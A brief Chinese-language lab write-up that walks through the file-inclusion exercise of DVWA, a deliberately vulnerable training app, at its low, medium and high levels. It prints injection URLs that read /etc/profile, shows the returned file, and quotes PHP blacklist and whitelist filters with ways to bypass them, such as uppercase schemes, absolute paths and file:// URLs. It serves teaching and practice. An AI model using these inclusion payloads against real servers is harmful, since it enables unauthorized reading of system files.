low
观察URL可发现,注入点在page,low等级直接注入
http://192.168.67.22/dvwa/vulnerabilities/fi/?page=/etc/profile返回结果如下:
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1)) # and Bourne compatible shells (bash(1), ksh(1), ash(1), ...). if [ "$PS1" ]; then if [ "$BASH" ] && [ "$BASH" != "/bin/sh" ]; then # The file bash.bashrc already sets the default PS1. # PS1='\h:\w\$ ' if [ -f /etc/bash.bashrc ]; then . /etc/bash.bashrc fi else if [ "`id -u`" -eq 0 ]; then PS1='# ' else PS1='$ ' fi fi fi if [ -d /etc/profile.d ]; then for i in /etc/profile.d/*.sh; do if [ -r $i ]; then . $i fi done unset i fi export JAVA_HOME=/opt/jdk1.8.0_25 export CLASS_PATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar export PATH=$PATH:$JAVA_HOME/binmedium
查看源码,发现以黑名单的方式过滤(删掉)了http://, https://, ../和..\
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );绕过思路http转大写,使用绝对路径等等。
high
查看源码,发现以白名单的方式允许file开头的文件和include.php
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" )绕过思路,以file://协议读取文件即可,注入代码如下:
http://192.168.67.22/dvwa/vulnerabilities/fi/?page=file:///etc/profile
704
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
